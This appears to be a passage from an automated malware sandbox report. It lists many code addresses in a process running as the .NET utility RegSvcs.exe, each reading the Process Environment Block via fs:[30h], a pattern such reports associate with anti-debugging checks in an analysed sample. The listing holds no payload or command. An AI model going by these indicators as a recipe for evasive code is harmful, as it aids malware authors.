                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]4_2_01388402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]4_2_01388402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]4_2_0137A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]4_2_0137A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]4_2_0137A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DC460 mov ecx, dword ptr fs:[00000030h]4_2_013DC460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134645D mov eax, dword ptr fs:[00000030h]4_2_0134645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137245A mov eax, dword ptr fs:[00000030h]4_2_0137245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013844B0 mov ecx, dword ptr fs:[00000030h]4_2_013844B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DA4B0 mov eax, dword ptr fs:[00000030h]4_2_013DA4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013564AB mov eax, dword ptr fs:[00000030h]4_2_013564AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013504E5 mov ecx, dword ptr fs:[00000030h]4_2_013504E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138273C mov eax, dword ptr fs:[00000030h]4_2_0138273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138273C mov ecx, dword ptr fs:[00000030h]4_2_0138273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138273C mov eax, dword ptr fs:[00000030h]4_2_0138273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CC730 mov eax, dword ptr fs:[00000030h]4_2_013CC730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C720 mov eax, dword ptr fs:[00000030h]4_2_0138C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C720 mov eax, dword ptr fs:[00000030h]4_2_0138C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01350710 mov eax, dword ptr fs:[00000030h]4_2_01350710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01380710 mov eax, dword ptr fs:[00000030h]4_2_01380710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C700 mov eax, dword ptr fs:[00000030h]4_2_0138C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358770 mov eax, dword ptr fs:[00000030h]4_2_01358770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DE75D mov eax, dword ptr fs:[00000030h]4_2_013DE75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01350750 mov eax, dword ptr fs:[00000030h]4_2_01350750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D4755 mov eax, dword ptr fs:[00000030h]4_2_013D4755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392750 mov eax, dword ptr fs:[00000030h]4_2_01392750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392750 mov eax, dword ptr fs:[00000030h]4_2_01392750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138674D mov esi, dword ptr fs:[00000030h]4_2_0138674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138674D mov eax, dword ptr fs:[00000030h]4_2_0138674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138674D mov eax, dword ptr fs:[00000030h]4_2_0138674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013507AF mov eax, dword ptr fs:[00000030h]4_2_013507AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F678E mov eax, dword ptr fs:[00000030h]4_2_013F678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013547FB mov eax, dword ptr fs:[00000030h]4_2_013547FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013547FB mov eax, dword ptr fs:[00000030h]4_2_013547FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]4_2_013727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]4_2_013727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]4_2_013727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DE7E1 mov eax, dword ptr fs:[00000030h]4_2_013DE7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135C7C0 mov eax, dword ptr fs:[00000030h]4_2_0135C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D07C3 mov eax, dword ptr fs:[00000030h]4_2_013D07C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136E627 mov eax, dword ptr fs:[00000030h]4_2_0136E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01386620 mov eax, dword ptr fs:[00000030h]4_2_01386620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01388620 mov eax, dword ptr fs:[00000030h]4_2_01388620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135262C mov eax, dword ptr fs:[00000030h]4_2_0135262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392619 mov eax, dword ptr fs:[00000030h]4_2_01392619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141866E mov eax, dword ptr fs:[00000030h]4_2_0141866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141866E mov eax, dword ptr fs:[00000030h]4_2_0141866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE609 mov eax, dword ptr fs:[00000030h]4_2_013CE609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01382674 mov eax, dword ptr fs:[00000030h]4_2_01382674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A660 mov eax, dword ptr fs:[00000030h]4_2_0138A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A660 mov eax, dword ptr fs:[00000030h]4_2_0138A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136C640 mov eax, dword ptr fs:[00000030h]4_2_0136C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013866B0 mov eax, dword ptr fs:[00000030h]4_2_013866B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C6A6 mov eax, dword ptr fs:[00000030h]4_2_0138C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01354690 mov eax, dword ptr fs:[00000030h]4_2_01354690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01354690 mov eax, dword ptr fs:[00000030h]4_2_01354690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D06F1 mov eax, dword ptr fs:[00000030h]4_2_013D06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D06F1 mov eax, dword ptr fs:[00000030h]4_2_013D06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0138A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A6C7 mov eax, dword ptr fs:[00000030h]4_2_0138A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E892B mov eax, dword ptr fs:[00000030h]4_2_013E892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D892A mov eax, dword ptr fs:[00000030h]4_2_013D892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348918 mov eax, dword ptr fs:[00000030h]4_2_01348918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348918 mov eax, dword ptr fs:[00000030h]4_2_01348918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DC912 mov eax, dword ptr fs:[00000030h]4_2_013DC912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE908 mov eax, dword ptr fs:[00000030h]4_2_013CE908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE908 mov eax, dword ptr fs:[00000030h]4_2_013CE908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DC97C mov eax, dword ptr fs:[00000030h]4_2_013DC97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F4978 mov eax, dword ptr fs:[00000030h]4_2_013F4978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F4978 mov eax, dword ptr fs:[00000030h]4_2_013F4978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]4_2_01376962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]4_2_01376962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]4_2_01376962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0139096E mov eax, dword ptr fs:[00000030h]4_2_0139096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0139096E mov edx, dword ptr fs:[00000030h]4_2_0139096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0139096E mov eax, dword ptr fs:[00000030h]4_2_0139096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D0946 mov eax, dword ptr fs:[00000030h]4_2_013D0946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D89B3 mov esi, dword ptr fs:[00000030h]4_2_013D89B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D89B3 mov eax, dword ptr fs:[00000030h]4_2_013D89B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D89B3 mov eax, dword ptr fs:[00000030h]4_2_013D89B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141A9D3 mov eax, dword ptr fs:[00000030h]4_2_0141A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013509AD mov eax, dword ptr fs:[00000030h]4_2_013509AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013509AD mov eax, dword ptr fs:[00000030h]4_2_013509AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013829F9 mov eax, dword ptr fs:[00000030h]4_2_013829F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013829F9 mov eax, dword ptr fs:[00000030h]4_2_013829F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DE9E0 mov eax, dword ptr fs:[00000030h]4_2_013DE9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013849D0 mov eax, dword ptr fs:[00000030h]4_2_013849D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E69C0 mov eax, dword ptr fs:[00000030h]4_2_013E69C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]4_2_01372835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]4_2_01372835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]4_2_01372835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01372835 mov ecx, dword ptr fs:[00000030h]4_2_01372835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]4_2_01372835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]4_2_01372835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F483A mov eax, dword ptr fs:[00000030h]4_2_013F483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F483A mov eax, dword ptr fs:[00000030h]4_2_013F483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A830 mov eax, dword ptr fs:[00000030h]4_2_0138A830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DC810 mov eax, dword ptr fs:[00000030h]4_2_013DC810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E6870 mov eax, dword ptr fs:[00000030h]4_2_013E6870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E6870 mov eax, dword ptr fs:[00000030h]4_2_013E6870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DE872 mov eax, dword ptr fs:[00000030h]4_2_013DE872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DE872 mov eax, dword ptr fs:[00000030h]4_2_013DE872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01380854 mov eax, dword ptr fs:[00000030h]4_2_01380854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01354859 mov eax, dword ptr fs:[00000030h]4_2_01354859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01354859 mov eax, dword ptr fs:[00000030h]4_2_01354859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01362840 mov ecx, dword ptr fs:[00000030h]4_2_01362840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DC89D mov eax, dword ptr fs:[00000030h]4_2_013DC89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141A8E4 mov eax, dword ptr fs:[00000030h]4_2_0141A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01350887 mov eax, dword ptr fs:[00000030h]4_2_01350887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C8F9 mov eax, dword ptr fs:[00000030h]4_2_0138C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C8F9 mov eax, dword ptr fs:[00000030h]4_2_0138C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E8C0 mov eax, dword ptr fs:[00000030h]4_2_0137E8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141AB40 mov eax, dword ptr fs:[00000030h]4_2_0141AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137EB20 mov eax, dword ptr fs:[00000030h]4_2_0137EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137EB20 mov eax, dword ptr fs:[00000030h]4_2_0137EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134CB7E mov eax, dword ptr fs:[00000030h]4_2_0134CB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01418B28 mov eax, dword ptr fs:[00000030h]4_2_01418B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01418B28 mov eax, dword ptr fs:[00000030h]4_2_01418B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F8B42 mov eax, dword ptr fs:[00000030h]4_2_013F8B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E6B40 mov eax, dword ptr fs:[00000030h]4_2_013E6B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E6B40 mov eax, dword ptr fs:[00000030h]4_2_013E6B40
